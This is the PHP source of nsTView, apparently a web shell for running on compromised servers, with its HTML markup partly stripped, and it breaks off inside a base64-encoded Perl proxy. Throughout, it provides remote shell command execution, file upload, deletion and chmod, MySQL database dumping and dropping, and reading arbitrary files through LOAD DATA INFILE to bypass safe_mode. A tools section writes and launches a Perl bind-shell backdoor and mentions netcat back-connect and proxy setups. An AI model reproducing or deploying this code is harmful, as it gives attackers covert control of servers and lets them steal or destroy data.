nsT View $ver

nsTView $ver:: nst.void.ru

nsTView $ver :: nst.void.ru
Host: ".$_SERVER["HTTP_HOST"]."
IP: ".gethostbyname($_SERVER["HTTP_HOST"])."
Your ip: ".$ip."

");} } $d=$_GET['d']; function adds($editf){ #if(get_magic_quotes_gpc()==0){ $editf=addslashes($editf); #} return $editf; } function adds2($editf){ if(get_magic_quotes_gpc()==0){ $editf=addslashes($editf); } return $editf; } $f = "nst_sql.txt"; $f_d = $_GET['f_d']; if($_GET['download']){ $download=$_GET['download']; header("Content-disposition: attachment; filename=\"$download\";"); readfile("$d/$download"); exit;} if($_GET['dump_download']){ header("Content-disposition: attachment; filename=\"$f\";"); header("Content-length: ".filesize($f_d."/".$f)); header("Expires: 0"); readfile($f_d."/".$f); if(is_writable($f_d."/".$f)){ unlink($f_d."/".$f); } die; } $images=array(".gif",".jpg",".png",".bmp",".jpeg"); $whereme=getcwd(); @$d=@$_GET['d']; $copyr = "nsTView $ver
o... Network security team ...o"; $php_self=@$_SERVER['PHP_SELF']; if(@eregi("/",$whereme)){$os="unix";}else{$os="win";} if(!isset($d)){$d=$whereme;} $d=str_replace("\\","/",$d); if(@$_GET['p']=="info"){ @phpinfo(); exit;} if(@$_GET['img']=="1"){ @$e=$_GET['e']; header("Content-type: image/gif"); readfile("$d/$e"); } if(@$_GET['getdb']=="1"){ header('Content-type: application/plain-text'); header('Content-Disposition: attachment; filename=nst-mysql-damp.htm'); } print "nsT View $ver "; print " "; if($os=="unix"){ echo " ";} echo" "; if($os=="win"){ echo " ";}else{echo "";} print ""; if($_GET['p']=="ftp"){ print "

0"; $expl=explode("/",$d); $coun=count($expl); if($os=="unix"){echo "/";} else{ echo "$expl[0]/";} for($i=1; $i<$coun; $i++){ @$xx.=$expl[$i]."/"; $sls="$expl[$i]/"; $sls=str_replace("//","/",$sls); $sls=str_replace("/'>/","/'>",$sls); print $sls; } if(@ini_get("register_globals")){$reg_g="ON";}else{$reg_g="OFF";} if(@ini_get("safe_mode")){$safe_m="ON";}else{$safe_m="OFF";} echo "

id: ".@exec('id')."

uname -a: ".@exec('uname -a')."

Your IP: [$ip] Server IP: [".gethostbyname($_SERVER["HTTP_HOST"])."] Server H.D.: [".$_SERVER["HTTP_HOST"]."]
[Safe mode: $safe_m] [Register globals: $reg_g]
[Back] [Home] [Shell (1) (2)] [Upload] [Tools] [PHPinfo] [DEL Folder] [SQL] [Self Remover]

< A B C D E F G H I J K L M N O P Q R S T U V W X Y Z

:: Create folder :: Create file :: Read file if safe mode is On ::"; if($os=="unix"){ print "PS table ::"; } print "

"; print "

"; print $copyr; exit; } if(@$_GET['p']=="sql"){ print ""; ### $f_d = $_GET['f_d']; if(!isset($f_d)){$f_d=".";} if($f_d==""){$f_d=".";} $php_self=$_SERVER['PHP_SELF']; $delete_table=$_GET['delete_table']; $tbl=$_GET['tbl']; $from=$_GET['from']; $to=$_GET['to']; $adress=$_POST['adress']; $port=$_POST['port']; $login=$_POST['login']; $pass=$_POST['pass']; $adress=$_GET['adress']; $port=$_GET['port']; $login=$_GET['login']; $pass=$_GET['pass']; $conn=$_GET['conn']; if(!isset($adress)){$adress="localhost";} if(!isset($login)){$login="root";} if(!isset($pass)){$pass="";} if(!isset($port)){$port="3306";} if(!isset($from)){$from=0;} if(!isset($to)){$to=50;} ?>

Address:
Login:
Pass:

PHP v".@phpversion()." mySQL v".@mysql_get_server_info()." ";}?>

Error: ".mysql_error().""); if($serv){$status="Connected. :: Log out";}else{$status="Disconnected.";} print "Status: $status

"; # #D7FFA8 print "
"; print "
[db]
"; print ""; $res = mysql_list_dbs($serv); while ($str=mysql_fetch_row($res)){ print "[DEL][DUMP] $str[0]
"; $tc++; } $baza=$_GET['baza']; $db=$_GET['db']; print "[Total db: $tc]
"; if($baza){ print "
db: [$db]

"; $result=@mysql_list_tables($db); while($str=@mysql_fetch_array($result)){ $c=mysql_query ("SELECT COUNT(*) FROM $str[0]"); $records=mysql_fetch_array($c); if(strlen($str[0])>$s4ot){$s4ot=strlen($str[0]);} if($records[0]=="0"){ print "[D][R][$records[0]] $str[0]
"; }else{ print "[D][R][$records[0]] $str[0]
"; } mysql_free_result($c); $total_t++; } print "
Total tables: $total_t"; print "
"; for($i=0; $i<$s4ot+10; $i++){print " ";} print "
"; } #end baza # delete table if(isset($delete_table)){ mysql_select_db($_GET['db']) or die("".mysql_error().""); mysql_query("DROP TABLE IF EXISTS $delete_table") or die("".mysql_error().""); print "
Table [ $delete_table ] :: Deleted success!"; print ""; } # end of delete table # delete database if(isset($_GET['delete_db'])){ mysql_drop_db($_GET['delete_db']) or die("".mysql_error().""); print "
Database ".$_GET['delete_db']." :: Deleted Success!"; print ""; } # end of delete database # delete row if(isset($_POST['delete_row'])){ $_POST['delete_row'] = base64_decode($_POST['delete_row']); mysql_query("DELETE FROM ".$_GET['tbl']." WHERE ".$_POST['delete_row']) or die("".mysql_error().""); $del_result = "
Deleted Success!
".$_POST['delete_row']; print ""; } # end of delete row $vn=$_GET['vn']; print " "; print "Database: $db => $vn"; # edit row if(isset($_POST['edit_row'])){ $edit_row=base64_decode($_POST['edit_row']); $r_edit = mysql_query("SELECT * FROM $tbl WHERE $edit_row") or die("".mysql_error().""); print "

"; print ""; print ""; print " Update
Insert new

"; $i=0; while($mn = mysql_fetch_array($r_edit, MYSQL_ASSOC)){ foreach($mn as $key =>$val){ $type = mysql_field_type($r_edit, $i); $len = mysql_field_len($r_edit, $i); $del .= "`$key`='".adds($val)."' AND "; $c=strlen($val); $val=htmlspecialchars($val, ENT_NOQUOTES); $str=" $val "; $buff .= ""; $i++; } } $delstring=base64_encode($del); print ""; print "$buff
Row Value

$key
($type($len)) $str

"; print "
"; if(!$_POST['makeupdate']){print "";} if($_POST['makeupdate']){ if($_POST['upd']=='update'){ preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3); $delstring=$_POST['delstring']; $delstring=base64_decode($delstring); $delstring = substr($delstring, 0, strlen($delstring)-5); for($i=0; $iPHP var:
\$sql=\"$up_string\";

"; print ""; mysql_query($up_string) or die("".mysql_error().""); }#end of make update if($_POST['upd']=='insert'){ preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3); $delstring=$_POST['delstring']; $delstring=base64_decode($delstring); $delstring = substr($delstring, 0, strlen($delstring)-5); for($i=0; $i".mysql_error().""); print "PHP var:
\$sql=\"$make_insert\";

"; print ""; }#end of insert }#end of update } # end of edit row # insert new line if($_GET['ins_new_line']){ $qn = mysql_query('SHOW FIELDS FROM '.$tbl) or die("".mysql_error().""); print "
Insert new line in $tbl table

"; print ""; while ($new_line = mysql_fetch_array($qn, MYSQL_ASSOC)) { foreach ($new_line as $key =>$next) { $buff .= "$next "; } $expl=explode(" ",$buff); $buff2 .= $expl[0]." "; print ""; unset($buff); } print "
$expl[0]
($expl[1])

"; if($_POST['mk_ins']){ preg_match_all("/(.*?)\s/i",$buff2,$matches3); for($i=0; $i".mysql_error().""); print "PHP var:
\$sql=\"$make_insert\";

"; print ""; }#end of mk ins }#end of ins new line if(isset($_GET['rename_table'])){ $rename_table=$_GET['rename_table']; print "

Rename $rename_table to

"; if(isset($_POST['new_name'])){ mysql_select_db($db) or die("".mysql_error().""); mysql_query("RENAME TABLE $rename_table TO ".$_POST['new_name']) or die("".mysql_error().""); print "
Table $rename_table renamed to ".$_POST['new_name'].""; print ""; } }#end of rename # dump table if($_GET['dump']){ if(!is_writable($f_d)){die("

This folder $f_d isnt writable!
Cannot make dump.

You can change temp folder for dump file in your browser!
Change variable &f_d=(here writable directory, expl: /tmp or c:/windows/temp)
Then press enter ");} mysql_select_db($db) or die("".mysql_error().""); $fp = fopen($f_d."/".$f,"w"); fwrite($fp, "# nsTView.php v$ver # Web: http://nst.void.ru # Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].") # MySQL version: ".mysql_get_server_info()." # PHP version: ".phpversion()." # Date: ".date("d.m.Y - H:i:s")." # Dump db ( $db ) Table ( $tbl ) # --- eof --- "); $que = mysql_query("SHOW CREATE TABLE `$tbl`") or die("".mysql_error().""); $row = mysql_fetch_row($que); fwrite($fp, "DROP TABLE IF EXISTS `$tbl`;\r\n"); $row[1]=str_replace("\n","\r\n",$row[1]); fwrite($fp, $row[1].";\r\n\r\n"); $que = mysql_query("SELECT * FROM `$tbl`"); if(mysql_num_rows($que)>0){ while($row = mysql_fetch_assoc($que)){ $keys = join("`, `", array_keys($row)); $values = array_values($row); foreach($values as $k=>$v) {$values[$k] = adds2($v);} $values = implode("', '", $values); $sql = "INSERT INTO `$tbl`(`$keys`) VALUES ('".$values."');\r\n"; fwrite($fp, $sql); } } fclose($fp); print ""; }#end of dump # db dump if($_GET['dump_db']){ $c=mysql_num_rows(mysql_list_tables($db)); if($c>=1){ print "

Dump database $db"; }else{ print "

Cannot dump database. No tables exists in $db db."; die; } if(sizeof($tabs)==0){ $res = mysql_query("SHOW TABLES FROM $db"); if(mysql_num_rows($res)>0){ while($row=mysql_fetch_row($res)){ $tabs[] .= $row[0]; } } } $fp = fopen($f_d."/".$f,"w"); fwrite($fp, "# nsTView.php v$ver # Web: http://nst.void.ru # Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].") # MySQL version: ".mysql_get_server_info()." # PHP version: ".phpversion()." # Date: ".date("d.m.Y - H:i:s")." # Dump db ( $db ) # --- eof --- "); foreach($tabs as $tab) { fwrite($fp,"DROP TABLE IF EXISTS `$tab`;\r\n"); $res = mysql_query("SHOW CREATE TABLE `$tab`"); $row = mysql_fetch_row($res); $row[1]=str_replace("\n","\r\n",$row[1]); fwrite($fp, $row[1].";\r\n\r\n"); $res = mysql_query("SELECT * FROM `$tab`"); if(mysql_num_rows($res)>0){ while($row=mysql_fetch_assoc($res)){ $keys = join("`, `", array_keys($row)); $values = array_values($row); foreach($values as $k=>$v) {$values[$k] = adds2($v);} $values = join("', '", $values); $sql = "INSERT INTO `$tab`(`$keys`) VALUES ('$values');\r\n"; fwrite($fp, $sql); }} fwrite($fp, "\r\n\r\n\r\n"); } fclose($fp); print ""; }#end of db dump $vnutr=$_GET['vnutr']; $tbl=$_GET['tbl']; if($vnutr and !$_GET['ins_new_line']){ print "
"; mysql_select_db($db) or die(mysql_error()); $c=mysql_query ("SELECT COUNT(*) FROM $tbl"); $cfa=mysql_fetch_array($c); mysql_free_result($c); print " Total: $cfa[0]
From: To: [DOWNLOAD] [INSERT] [DUMP]
"; $vn=$_GET['vn']; $from=$_GET['from']; $to=$_GET['to']; $from=$_GET['from']; $to=$_GET['to']; if(!isset($from)){$from=0;} if(!isset($to)){$to=50;} $query = "SELECT * FROM $vn LIMIT $from,$to"; $result = mysql_query($query); $result1= mysql_query($query); print $del_result; print ""; for ($i=0;$i $name ($type($len))"; } print "
"; while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){ foreach($mn as $key=>$inside){ $buffer1 .= "`$key`='".adds($inside)."' AND "; $b1 .= "
"; } $buffer1 = substr($buffer1, 0, strlen($buffer1)-5); $buffer1 = base64_encode($buffer1); print "\r\n"; print $b1; print ""; unset($b1); unset($buffer1); } mysql_free_result($result); print "
".htmlspecialchars($inside, ENT_NOQUOTES)."

"; } #end vnutr print "
"; } # end $conn ### end of sql print " "; print $copyr; die; } @$p=$_GET['p']; if(@$_GET['p']=="selfremover"){ print ""; print "Are you sure?
Yes | No
Remove: "; $path=__FILE__; print $path; print " ?"; die; } if($p=="yes"){ $path=__FILE__; @unlink($path); $path=str_replace("\\","/",$path); if(file_exists($path)){$hmm="NOT DELETED!!!"; print "FILE $path NOT DELETED"; }else{$hmm="DELETED";} print ""; } if($os=="unix"){ function fastcmd(){ global $fast_commands; $c_f=explode("\n",$fast_commands); $c_f=count($c_f)-2; print "
Total commands: $c_f

"; } }#end of os unix if($os=="win"){ function fastcmd(){ global $fast_commands_win; $c_f=explode("\n",$fast_commands_win); $c_f=count($c_f)-2; print "
Total commands: $c_f

"; } }#end of os win echo " "; if(@$_GET['sh311']=="1"){echo "cmd
pwd: "; chdir($d); echo getcwd()."

Fast cmd:
"; fastcmd(); if($os=="win"){$d=str_replace("/","\\\\",$d);} print " Insert pwd

"; if(@$_POST['sh3']){ $sh3=$_POST['sh3']; echo "
"; print `$sh3`; echo "
"; } } if(@$_GET['sh311']=="2"){ echo "cmd
pwd: "; chdir($d); echo getcwd()."

Fast cmd:
"; fastcmd(); if($os=="win"){$d=str_replace("/","\\\\",$d);} print " Insert pwd

"; if(@$_POST['sh3']){ $sh3=$_POST['sh3']; echo "
"; print `$sh3`; echo "
";} echo $copyr; exit;} if(@$_GET['delfl']){ @$delfolder=$_GET['delfolder']; echo "DELETE FOLDER: ".@$_GET['delfolder']."
(All files must be writable)
Yes || No

"; echo $copyr; exit; } $mkdir=$_GET['mkdir']; if($mkdir){ print "
Create Folder in $d :

New folder name:

"; if($_POST['dir_n']){ mkdir($d."/".$_POST['dir_n']) or die('Cannot create directory '.$_POST['dir_n']); print "Directory created success!"; } print $copyr; die; } $mkfile=$_GET['mkfile']; if($mkfile){ print "
Create file in $d :

File name:
(example: hello.txt , hello.php)

"; if($_POST['file_n']){ $fp=fopen($d."/".$_POST['file_n'],"w") or die('Cannot create file '.$_POST['file_n']); fwrite($fp,""); print "File created success!"; } print $copyr; die; } $ps_table=$_GET['ps_table']; if($ps_table){ if($_POST['kill_p']){ exec("kill -9 ".$_POST['kill_p']); } $str=`ps aux`; # You can put here preg_match_all for other distrib/os preg_match_all("/(?:.*?)([0-9]{1,7})(.*?)\s\s\s[0-9]:[0-9][0-9]\s(.*)/i",$str,$matches); print "
PS Table :: Fast kill program
(p.s: Tested on Linux slackware 10.0)

"; print ""; for($i=0; $i"; }#end of for print "
$expl[0] PID: ".$matches[1][$i]." :: ".$matches[3][$i]."
Kill:

"; unset($str); print $copyr; die; }#end of ps table $read_file_safe_mode=$_GET['read_file_safe_mode']; if($read_file_safe_mode){ if(!isset($_POST['l'])){$_POST['l']="root";} print "
Read file content using MySQL - when safe_mode, open_basedir is ON

Addr:

Login:

Passw:
(example: /etc/hosts)

"; if($_POST['read_file']){ $read_file=$_POST['read_file']; @mysql_connect($_POST['serv_ip'].":".$_POST['port'],$_POST['l'],$_POST['p']) or die("".mysql_error().""); mysql_create_db("tmp_bd_file") or die("".mysql_error().""); mysql_select_db("tmp_bd_file") or die("".mysql_error().""); mysql_query('CREATE TABLE `tmp_file` ( `file` LONGBLOB NOT NULL );') or die("".mysql_error().""); mysql_query("LOAD DATA INFILE \"".addslashes($read_file)."\" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query) or die("".mysql_error().""); print "File content:

"; for($i=0;$i$col_value) { print htmlspecialchars($col_value)."
";}} mysql_free_result($result); mysql_drop_db("tmp_bd_file") or die("".mysql_error().""); } print $copyr; die; }#end of read_file_safe_mode # sys $wich_f=$_GET['wich_f']; $delete=$_GET['delete']; $del_f=$_GET['del_f']; $chmod=$_GET['chmod']; $ccopy_to=$_GET['ccopy_to']; # delete if(@$_GET['del_f']){ if(!isset($delete)){ print "Delete this file?
$d/$wich_f

Yes / No ";} if($delete==1){ unlink($d."/".$del_f); print "File: $d/$del_f DELETED!
# BACK "; } echo $copyr; exit; } # copy to if($ccopy_to){ $wich_f=$_POST['wich_f']; $to_f=$_POST['to_f']; print "Copy file:
$d/$ccopy_to

File:

To:

"; if($to_f){ @copy($wich_f,$to_f) or die("Cannot copy!!! maybe folder is not writable"); print "Copy success!!!
"; } echo $copyr; exit; } # chmod if(@$_GET['chmod']){ $perms = @fileperms($d."/".$wich_f); print "CHMOD file $d/$wich_f

This file chmod is "; print perm($perms); print "
"; $chmd=<<

CHMOD (File Permissions)

Permission Owner Group Other
Read
Write
Execute
Octal: =
Symbolic: =

HTML; print "".$chmd." $d/$wich_f

"; $t_total=$_POST['t_total']; if($t_total){ chmod($d."/".$wich_f,$t_total); print "
Now chmod is $t_total

"; print "# BACK

"; } echo $copyr; exit; } # rename if(@$_GET['rename']){ print "RENAME $d/$wich_f ?

RENAME
$wich_f

TO

"; @$rto=$_POST['rto']; if($rto){ $fr1=$d."/".$wich_f; $fr1=str_replace("//","/",$fr1); $to1=$d."/".$rto; $to1=str_replace("//","/",$to1); rename($fr1,$to1); print "File
$wich_f
Renamed to $rto

"; echo ""; } echo $copyr; exit; } if(@$_GET['deldir']){ @$dir=$_GET['dir']; function deldir($dir) { $handle = @opendir($dir); while (false!==($ff = @readdir($handle))){ if($ff != "." && $ff != ".."){ if(@is_dir("$dir/$ff")){ deldir("$dir/$ff"); }else{ @unlink("$dir/$ff"); }}} @closedir($handle); if(@rmdir($dir)){ @$success = true;} return @$success; } $dir=@$dir; deldir($dir); $rback=$_GET['rback']; @$rback=explode("/",$rback); $crb=count($rback); for($i=0; $i<$crb-1; $i++){ @$x.=$rback[$i]."/"; } echo ""; echo $copyr; exit;} if(@$_GET['t']=="tools"){ # unix if($os=="unix"){ print "
P.S: After you Start, your browser may stuck! You must close it, and then run nstview.php again.

[Name] [C] [Port] [Perl] [Port] [Other options, info]

Backdoor:
none

Back connect: b.c. ip: nc -l -p 5546

Datapipe: other serv ip: port:

Web proxy:
none

Socks 4 serv: none

Socks 5 serv: none

"; }#end of unix if($_POST['perl_bd']){ $port=$_POST['port']; $perl_bd_scp = " use Socket;\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')); setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);bind(S,sockaddr_in(\$p,INADDR_ANY)); listen(S,50);while(1){accept(X,S);if(!(\$pid=fork)){if(!defined \$pid){exit(0);} open STDIN,\"<&X\";open STDOUT,\">&X\";open STDERR,\">&X\";exec(\"/bin/sh -i\"); close X;}}"; if(is_writable("/tmp")){ $fp=fopen("/tmp/nst_perl_bd.pl","w"); fwrite($fp,"$perl_bd_scp"); passthru("nohup perl /tmp/nst_perl_bd.pl &"); unlink("/tmp/nst_perl_bd.pl"); }else{ if(is_writable(".")){ mkdir(".nst_bd_tmp"); $fp=fopen(".nst_bd_tmp/nst_perl_bd.pl","w"); fwrite($fp,"$perl_bd_scp"); passthru("nohup perl .nst_bd_tmp/nst_perl_bd.pl &"); unlink(".nst_bd_tmp/nst_perl_bd.pl"); rmdir(".nst_bd_tmp"); } } $show_ps="1"; }#end of start perl_bd if($_POST['perl_proxy']){ $port=$_POST['port']; $perl_proxy_scp = "IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4vcGVybA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtIGh0dHAgcHJveHkgc2VydmVyLiB6YXB1c2thamVtOiBwZXJsIHByb3h5LnBsCTgxODEgbHVib2ogcG9ydCB2aTZpIDEwMjQtDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KI3JlcXVpcmUgInN5cy9zb2NrZXQucGgiOw0KdXNlIFNvY2tldDsNCnNyYW5kICh0aW1lfHwkJCk7DQojLS0tICBEZWZpbmUgYSBmcmllbmRseSBleGl0IGhhbmRsZXINCiRTSUd7J0tJTEwnfSA9ICRTSUd7UVVJVH0gPSAkU0lHe0lOVH0gPSAnZXhpdF9oYW5kbGVyJzsNCnN1YiBleGl0X2hhbmRsZXIgew0KICAgIHByaW50ICJcblxuIC0tLSBQcm94eSBzZXJ2ZXIgaXMgZHlpbmcgLi4uXG5cbiI7DQogICAgY2xvc2UoU09DS0VUKTsNCiAgICBleGl0Ow0KDQp9DQojLS0tICBTZXR1cCBzb2NrZXQNCg0KJHwgPSAxOw0KJHByb3h5X3BvcnQgPSBzaGlmdChAQVJHVik7DQokcHJveHlfcG9ydCA9IDgxODEgdW5sZXNzICRwcm94eV9wb3J0ID1+IC9cZCsvOw0KDQokc29ja2V0X2Zvcm1hdCA9ICdTIG4gYTQgeDgnOw0KJmxpc3Rlbl90b19wb3J0KFNPQ0tFVCwgJHByb3h5X3BvcnQpOw0KJGxvY2FsX2hvc3QgPSBgaG9zdG5hbWVgOw0KY2hvcCgkbG9jYWxfaG9zdCk7DQokbG9jYWxfaG9zdF9pcCA9IChnZXRob3N0YnluYW1lKCRsb2NhbF9ob3N0KSlbNF07DQpwcmludCAiIC0tLSBQcm94eSBzZXJ2ZXIgcnVubmluZyBvbiAkbG9jYWxfaG9zdCBwb3J0OiAkcHJveHlfcG9ydCBcblxuIjsNCiMtLS0gIExvb3AgZm9yZXZlciB0YWtpbmcgcmVxdWVzdHMgYXMgdGhleSBjb21lDQp3aGlsZSAoMSkgew0KIy0tLSAgV2FpdCBmb3IgcmVxdWVzdA0KICAgIHByaW50ICIgLS0tIFdhaXRpbmcgdG8gYmUgb2Ygc2VydmljZSAuLi5cbiI7DQogICAgKCRhZGRyID0gYWNjZXB0KENISUxELFNPQ0tFVCkpIHx8IGRpZSAiYWNjZXB0ICQhIjsNCiAgICAoJHBvcnQsJGluZXRhZGRyKSA9ICh1bnBhY2soJHNvY2tldF9mb3JtYXQsJGFkZHIpKVsxLDJdOw0KICAgIEBpbmV0YWRkciA9IHVucGFjaygnQzQnLCRpbmV0YWRkcik7DQogICAgcHJpbnQgIkNvbm5lY3Rpb24gZnJvbSAiLCBqb2luKCIuIiwgQGluZXRhZGRyKSwgIiAgcG9ydDogJHBvcnQgXG4iOw0KIy0tLSAgRm9yayBhIHN1YnByb2Nlc3MgdG8gaGFuZGxlIHJlcXVlc3QuDQojLS0tICBQYXJlbnQgcHJvY2VzIGNvbnRpbnVlcyBsaXN0ZW5pbmcuDQogICAgaWYgKGZvcmspIHsNCgl3YWl0OwkJIyBGb3Igbm93IHdlIHdhaXQgZm9yIHRoZSBjaGlsZCB0byBmaW5pc2gNCgluZXh0OwkJIyBXZSB3YWl0IHNvIHRoYXQgcHJpbnRvdXRzIGRvbid0IG1peA0KICAgIH0NCiMtLS0gIFJlYWQgZmlyc3QgbGluZSBvZiByZXF1ZXN0IGFuZCBhbmFseXplIGl0Lg0KIy0tLSAgUmV0dXJuIGFuZCBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QgbWV0aG9kLg0KICAgKCRmaXJzdCwkbWV0aG9kKSA9ICZhbmFseXplX3JlcXVlc3Q7DQojLS0tICBTZW5kIHJlcXVlc3QgdG8gcmVtb3RlIGhvc3QNCiAgICBwcmludCBVUkwgJGZpcnN0Ow0KICAgIHByaW50ICRmaXJzdDsNCiAgICB3aGlsZSAoPENISUxEPikgew0KCXByaW50ICRfOw0KCW5leHQgaWYgKC9Qcm94eS1Db25uZWN0aW9uOi8pOw0KCXByaW50IFVSTCAkXzsNCglsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvKTsNCiAgICB9DQogICAgaWYgKCRtZXRob2QgZXEgIlBPU1QiKSB7DQoJJGRhdGEgPSA8Q0hJTEQ+Ow0KCXByaW50ICRkYXRhOw0KCXByaW50IFVSTCAkZGF0YTsNCiAgICB9DQogICAgcHJpbnQgVVJMICJcbiI7DQojLS0tICBXYWl0IGZvciByZXNwb25zZSBhbmQgdHJhbnNmZXIgaXQgdG8gcmVxdWVzdG9yLg0KICAgIHByaW50ICIgLS0tIERvbmUgc2VuZGluZy4gUmVzcG9uc2U6IFxuXG4iOw0KICAgICRoZWFkZXIgPSAxOw0KICAgICR0ZXh0ID0gMDsNCiAgICB3aGlsZSAoPFVSTD4pIHsNCglwcmludCBDSElMRCAkXzsNCglpZiAoJGhlYWRlciB8fCAkdGV4dCkgewkgICAgICMgT25seSBwcmludCBoZWFkZXIgJiB0ZXh0IGxpbmVzIHRvIFNURE9VVA0KCSAgICBwcmludCAkXzsNCgkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15bXHNceDAwXSokLykgew0KCQkkaGVhZGVyID0gMDsNCgkgICAgfQ0KIwkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15Db250ZW50LXR5cGU6IHRleHQvKSB7DQojCQkkdGV4dCA9IDE7DQojCSAgICB9DQoJfQ0KICAgIH0NCiAgICBjbG9zZShVUkwpOw0KICAgIGNsb3NlKENISUxEKTsNCiAgICBleGl0OwkJCSMgRXhpdCBmcm9tIGNoaWxkIHByb2Nlc3MNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojLS0JYW5hbHl6ZV9yZXF1ZXN0CQkJCQkJCS0tDQojLS0JCQkJCQkJCQktLQ0KIy0tCUFuYWx5emUgYSBuZXcgcmVxdWVzdC4gIEZpcnN0IHJlYWQgaW4gZmlyc3QgbGluZSBvZiByZXF1ZXN0LgktLQ0KIy0tCVJlYWQgVVJMIGZyb20gaXQsIHByb2Nlc3MgVVJMIGFuZCBvcGVuIGNvbm5lY3Rpb24uCQktLQ0KIy0tCVJldHVybiBhbiBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QJLS0NCiMtLQltZXRob2QuCQkJCQkJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBhbmFseXplX3JlcXVlc3Qgew0KIy0tLSAgUmVhZCBmaXJzdCBsaW5lIG9mIEhUVFAgcmVxdWVzdA0KICAgICRmaXJzdCA9IDxDSElMRD47DQoNCiAgICAkdXJsID0gKCRmaXJzdCA9fiBtfChodHRwOi8vXFMrKXwpWzBdOw0KICAgIHByaW50ICJSZXF1ZXN0IGZvciBVUkw6ICAkdXJsIFxuIjsNCg0KIy0tLSAgQ2hlY2sgaWYgZmlyc3QgbGluZSBpcyBvZiB0aGUgZm9ybSBHRVQgaHR0cDovL2hvc3QtbmFtZSAuLi4NCiAgICAoJG1ldGhvZCwgJHJlbW90ZV9ob3N0LCAkcmVtb3RlX3BvcnQpID0gDQoJKCRmaXJzdCA9fiBtIShHRVR8UE9TVHxIRUFEKSBodHRwOi8vKFteLzpdKyk6PyhcZCopISApOw0KIy0tLSAgSWYgbm90LCBiYWQgcmVxdWVzdC4NCiAgICANCiAgICBpZiAoISRyZW1vdGVfaG9zdCkgew0KCXByaW50ICRmaXJzdDsNCgl3aGlsZSAoPENISUxEPikgew0KCSAgICBwcmludCAkXzsNCgkgICAgbGFzdCBpZiAoJF8gPX4gL15bXHNceDAwXSokLyk7DQoJfQ0KCXByaW50ICJJbnZhbGlkIEhUVFAgcmVxdWVzdCBmcm9tICIsIGpvaW4oIi4iLCBAaW5ldGFkZHIpLCAiXG4iOw0KIwlwcmludCBDSElMRCAiQ29udGVudC10eXBlOiB0ZXh0L3BsYWluIiwiXG5cbiI7DQoJcHJpbnQgQ0hJTEQgIkkgZG9uJ3QgdW5kZXJzdGFuZCB5b3VyIHJlcXVlc3QuXG4iOw0KCWNsb3NlKENISUxEKTsNCglleGl0Ow0KICAgIH0NCiMtLS0gIElmIHJlcXVlc3RlZCBVUkwgaXMgdGhlIHByb3h5IHNlcnZlciB0aGVuIGlnbm9yZSByZXF1ZXN0DQogICAgJHJlbW90ZV9pcCA9IChnZXRob3N0YnluYW1lKCRyZW1vdGVfaG9zdCkpWzRdOw0KICAgIGlmICgoJHJlbW90ZV9pcCBlcSAkbG9jYWxfaG9zdF9pcCkgJiYgKCRyZW1vdGVfcG9ydCBlcSAkcHJveHlfcG9ydCkpIHsNCglwcmludCAkZmlyc3Q7DQoJd2hpbGUgKDxDSElMRD4pIHsNCgkgICAgcHJpbnQgJF87DQoJICAgIGxhc3QgaWYgKCRfID1+IC9eW1xzXHgwMF0qJC8pOw0KCX0NCglwcmludCAiIC0tLSBDb25uZWN0aW9uIHRvIHByb3h5IHNlcnZlciBpZ25vcmVkLlxuIjsNCiMJcHJpbnQgQ0hJTEQgIkNvbnRlbnQtdHlwZTogdGV4dC9wbGFpbiIsIlxuXG4iOw0KCXByaW50IENISUxEICJJdCdzIG5vdCBuaWNlIHRvIG1ha2UgbWUgbG9vcCBvbiBteXNlbGYhLlxuIjsNCgljbG9zZShDSElMRCk7DQoJZXhpdDsNCiAgICB9DQojLS0tICBTZXR1cCBjb25uZWN0aW9uIHRvIHRhcmdldCBob3N0IGFuZCBzZW5kIHJlcXVlc3QNCiAgICAkcmVtb3RlX3BvcnQgPSAiaHR0cCIgdW5sZXNzICgkcmVtb3RlX3BvcnQpOw0KICAgICZvcGVuX2Nvbm5lY3Rpb24oVVJMLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7DQojLS0tICBSZW1vdmUgcmVtb3RlIGhvc3RuYW1lIGZyb20gVVJMDQogICAgICAgICRmaXJzdCA9fiBzL2h0dHA6XC9cL1teXC9dKy8vOw0KICAgICgkZmlyc3QsICRtZXRob2QpOw0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtLQlsaXN0ZW5fdG9fcG9ydChTT0NLRVQsICRwb3J0KQkJCQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IH